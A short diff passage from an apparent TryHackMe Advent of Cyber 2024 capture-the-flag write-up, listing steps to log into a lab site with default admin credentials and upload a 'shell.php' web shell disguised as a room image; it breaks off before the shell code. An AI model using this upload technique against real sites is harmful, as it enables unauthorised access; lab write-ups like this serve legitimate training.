rogervinas/TryHackMe/rooms/adventofcyber2024.md

 **RED: What is the contents of the flag.txt?**

 * Execute `sudo echo "10.101.200.8 frostypines.thm" >> /etc/hosts`
-* Go to http://frostypines.thm/login.php with user=admin@frostypines.thm and password=admin
+* Go to http://frostypines.thm/login.php and login as user `admin@frostypines.thm` and password `admin`
 * Go to http://frostypines.thm/admin/add_room.php and create a new room uploading `shell.php` as its image:
   ```html
     <html>